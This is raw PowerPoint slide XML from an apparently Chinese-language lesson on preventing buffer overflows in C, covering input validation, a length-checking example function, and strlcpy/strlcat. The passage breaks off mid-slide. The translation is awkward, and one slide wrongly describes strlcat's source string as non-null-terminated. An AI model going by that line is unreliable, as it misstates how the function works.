              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73731" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1981200"/>
            <a:ext cx="8001000" cy="3429000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>假设一个固定大小的缓冲区</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>在缓冲区满了以后，不可能添加再数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>因为静态的方法丢弃了超出的数据，所以实际的程序数据会丢失。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>因此，生成的字符串必须被充分验证</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">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64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="390320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a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>输入验证</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74755" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1905000"/>
            <a:ext cx="8229600" cy="4953000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" b="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>缓冲区溢出通常是字符串或内存越界拷贝的结果。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2500" b="1">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" b="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>缓冲区溢出是确保输入数据的大小不超过其存储的最小缓冲区来可以预防。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2500" b="1">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2500" b="1">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 1. int myfunc(const char *arg) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 2.   char buff[100];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 3.   if (strlen(arg) &gt;= sizeof(buff)) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 4.     abort();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 5.   }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 6. }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:latin typeface="Courier New"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65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6401210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a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>静态防范措施</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75779" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="2286000"/>
            <a:ext cx="8140700" cy="4359275"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>输入验证</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1">
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strlcpy()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strlcat()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>ISO/IEC “Security” TR 24731</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN">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66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24831292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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strlcpy()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strlcat()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76803" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1752600"/>
            <a:ext cx="8153400" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>采用一个更不容易出错的方式来复制和链接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>size_t strlcpy(char *dst,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>const char *src, size_t size);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>size_t strlcat(char *dst, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>	const char *src, size_t size);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strlcpy()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>复制空结尾的字符串到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>dst </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>直到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>大小的字符</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2500">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strlcat()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>函数把非空结尾的字符串</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>连接到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>dst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>末尾</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>不超过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>的字符都能够连接到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>dst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>末尾</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a: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67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35707088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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>大小问题   </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77827" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>为了阻止缓冲区溢出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strlcpy()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strlcat()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>接受</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>大小的目标字符串作为参数。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>对于静态分配目标缓冲区来说，这个值能够很容易地通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
